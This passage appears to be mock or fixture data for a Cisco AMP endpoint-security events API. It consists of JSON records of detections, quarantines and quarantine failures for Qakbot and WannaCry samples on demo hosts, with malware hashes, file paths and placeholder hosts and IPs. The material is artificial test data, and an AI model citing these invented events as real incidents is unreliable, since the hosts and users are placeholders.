Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 